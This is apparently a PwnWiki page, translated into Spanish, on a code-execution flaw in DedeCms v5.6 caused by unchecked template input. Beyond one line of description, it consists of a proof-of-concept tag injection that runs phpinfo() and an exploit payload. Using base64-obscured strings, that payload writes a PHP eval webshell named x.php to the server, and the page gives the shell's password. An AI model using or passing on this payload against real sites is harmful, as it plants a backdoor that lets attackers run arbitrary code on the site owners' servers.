DedeCms v5.6 vulnerabilidad de ejecución de código malicioso integrado

This page is a translated version of the page DedeCms v5.6 嵌入惡意代碼執行漏洞 and the translation is 100% complete.

Other languages:

Chinese • ‎español • ‎português • ‎中文（台灣）‎

Información de vulnerabilidad

En la ubicación donde se carga el software, la dirección local no se verifica de manera efectiva y puede usarse de manera maliciosa.

POC

a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，

EXP

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

x.php
password:xiao

Anonymous

Search

DedeCms v5.6 vulnerabilidad de ejecución de código malicioso integrado

Namespaces

More

Page actions

Información de vulnerabilidad

POC

EXP

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

DedeCms v5.6 vulnerabilidad de ejecución de código malicioso integrado

Información de vulnerabilidad

POC

EXP

Navigation

Wiki tools

Page tools